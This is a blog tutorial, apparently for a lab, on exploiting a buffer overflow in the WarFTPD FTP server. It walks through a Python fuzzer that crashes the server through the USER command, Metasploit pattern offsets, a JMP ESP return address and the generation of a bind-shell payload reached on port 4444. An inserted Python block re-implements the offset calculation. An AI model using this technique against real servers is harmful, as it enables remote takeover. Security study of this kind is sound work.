Sunday, October 7, 2012

Buffer Overflow with a Fuzzer and Fuzzing, Using WarFTPD & OllyDbg

Buffer Overflow
A buffer overflow is a condition that arises in a computer's memory during an otherwise normal operation, the temporary storage of data in memory: it occurs when the data to be stored exceeds the capacity of the buffer (the temporary storage area) that is meant to hold it.

FUZZER
The word "fuzzer" is widely used in science and technology, one example being fuzzy logic, but the fuzzer discussed here has no relationship with fuzzy logic. A fuzzer is the name for the application used to carry out the process of fuzzing.

FUZZING
Fuzzing is an early stage that a security researcher is sure to perform: the application is fed data that is not normal, so that one can see how the application handles that data and how it performs error handling. From this process, a researcher can see whether there is a security gap in the application that can be exploited.

Tools
The tools that will be used are as follows:
* OllyDbg, as the debugger
* Fuzzer, to perform the fuzzing process
* Python, used to create the fuzzer application and the exploit

WarFTPD
The application that will be used as the target is WarFTPD, made by Jarle (jgaa) Aase; it is an FTP server application that runs on the Windows operating system, as seen in the image below:

Since the application to be exploited is an FTP server, here I am trying to make a simple fuzzer that can send data over the FTP protocol. The fuzzer is created using the Python language, as in the example below:
#!/usr/bin/python
import socket

# Test data: 1000 'A' (0x41) bytes, sent as the argument of the FTP USER command
buffer = b"\x41" * 1000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.56.101', 21))    # WarFTPD running on the lab VM
data = s.recv(1024)                  # read the FTP banner first
print("sending evil data via USER command...")
s.send(b'USER ' + buffer + b'\r\n')  # FTP command lines end with CRLF
data = s.recv(1024)
s.send(b'PASS PASSWORD' + b'\r\n')
s.close()
print("Finish")

To run the WarFTP server, select Properties -> Service from the Start menu; the WarFTP status will become idle. To check whether the server is running and can be reached from the BackTrack system, try connecting to the FTP port with nc by running the following command:

The next step is to run the fuzzer application, which is launched from the command line; make sure the VirtualBox window from before can be seen clearly, so that you can watch what happens to the WarFTP server application:
root@bt:~# python BackTrack.py

This time OllyDbg will also be used to debug the WarFTP server application.

For OllyDbg to see what happens when the application crashes, the WarFTP server must be run through OllyDbg. When the WarFTP server application is started again under OllyDbg, an error message will appear. To prevent this error from appearing again during the development process, follow these steps:

* delete the FtpDaemon file.
* run the WarFTP server application again.
* create a dummy user through User Security.

Once WarFTP runs normally again without producing error messages, run the WarFTP server application through OllyDbg.

It will then appear like the following:

Let's go. Now, through the Konsole application on BackTrack, go into the following folder:
#cd /opt/metasploit/msf3/tools/

If pattern_create.rb is there, run it to generate 1000 bytes of data, like this:
./pattern_create.rb 1000 > string_pattern.txt

Look at the string of 1000 characters, starting with the characters "Aa0Aa1Aa2Aa3A" and ending with the characters "Bh0Bh1Bh2B".
After the string pattern has been created, the next step is to put this data into the fuzzer application made earlier: the pattern data is going to replace the "A" data in the fuzzer. Use a text editor to modify the existing fuzzer script.

After replacing it with the string pattern generated by pattern_create.rb, continue with the next step: run the WarFTP server application through OllyDbg.

Unlike before, the register values in the WarFTP server application's memory are now filled with the string pattern that was placed in the fuzzer application; note the data contained in the registers. Now use the pattern_offset application, which will calculate how many bytes of data lie between the start of the pattern and the string contained in those registers. Run in the Konsole as below:
#./pattern_offset.rb 32714131   -> EIP value
486 -> EIP
It takes 485 bytes of data
#./pattern_offset.rb q4Aq5Aq   -> ESP value
493
-> 493 bytes of data are required to reach the stack
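The offset arithmetic behind pattern_create.rb and pattern_offset.rb, re-implemented here as an added Python example (it is not the Metasploit code and not part of the original post), together with the little-endian packing that is later applied to the JMP ESP address. It assumes Metasploit's default pattern alphabet (uppercase, lowercase, digits); the ESP query lands at 493 as in the post, and the EIP register value is unpacked as a little-endian word before searching, which gives 485, the padding length the post reports.

```python
import string
import struct

# Added example, not part of the original post or of Metasploit: a Python
# re-implementation of the offset arithmetic behind pattern_create.rb and
# pattern_offset.rb, plus the little-endian packing of a 32-bit address.


def pattern_create(length):
    """Metasploit-style cyclic pattern 'Aa0Aa1Aa2...Az9Ba0...': every 4-byte
    window is unique, so one register value pins down exactly one offset.
    Assumes the default alphabet; uniqueness holds up to 20280 bytes."""
    full = "".join(u + l + d for u in string.ascii_uppercase
                   for l in string.ascii_lowercase for d in string.digits)
    return full[:length]


def pattern_offset(length, query):
    """Offset of `query` within pattern_create(length), or -1 if absent.
    `query` is either text copied from the pattern (e.g. 'q4Aq5Aq') or a
    register value as shown by OllyDbg (e.g. '32714131' or '0x32714131').
    x86 is little-endian, so such a word is unpacked to the bytes '1Aq2'
    before the search. The literal text is tried first, so pattern text that
    happens to consist of hex digits (such as 'Aa0Aa1Aa') is not misread."""
    pattern = pattern_create(length)
    offset = pattern.find(query)
    q = query[2:] if query.lower().startswith("0x") else query
    if offset < 0 and len(q) == 8 and all(c in string.hexdigits for c in q):
        # decode as latin-1 so bytes above 0x7f (e.g. in DEADBEEF) still map 1:1
        offset = pattern.find(struct.pack("<I", int(q, 16)).decode("latin-1"))
    return offset


def little_endian(addr):
    """Pack a 32-bit address the way it is written into the buffer:
    0x7E429353 becomes the bytes 53 93 42 7E."""
    return struct.pack("<I", addr)


if __name__ == "__main__":
    p = pattern_create(1000)
    print(p[:13], "...", p[-10:])            # Aa0Aa1Aa2Aa3A ... Bh0Bh1Bh2B
    print(pattern_offset(1000, "32714131"))  # EIP value read from OllyDbg
    print(pattern_offset(1000, "q4Aq5Aq"))   # pattern text found at ESP
    print(little_endian(0x7E429353))
```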

Now continue by entering the fuzzer script shown below, and proceed as in the previous step.

Now look at the values shown in the stack and registers windows of OllyDbg: the value in the EIP register has become DEADBEEF.

Run the application using OllyDbg and open the Executable modules window;
it will then appear like the following.

If it looks like the above, proceed to determine which library you want to use: double-click the file name, and it will appear as follows.
Once it appears as below, right-click in the main window: Search for -> Command.

Enter JMP ESP in the Find Command window and press Find.

Then the address of JMP ESP will be shown; on my system it is 7E429353,
as follows:

The next thing to do is to change the address into little-endian format, from 7E429353 to \x53\x93\x42\x7E; note the following script:

Now run WarFTP through OllyDbg again as before;
it will then appear as follows:

Now run WarFTP through OllyDbg again as before,
right-click the selected address and choose Breakpoint -> Memory, on access.
Next, in the console, run ./msfweb.

Now we move on to the payload. Choose the payload that will be built next; Metasploit will display the configuration menu for the chosen shell payload type, as shown in the figure below. After you finish, don't forget to press Generate to generate the selected payload:

Now insert the generated payload code into the fuzzer application used previously, as follows:

Now run WarFTP through OllyDbg again as before; if there is no error, run # telnet 192.168.56.101 4444, and the following will occur: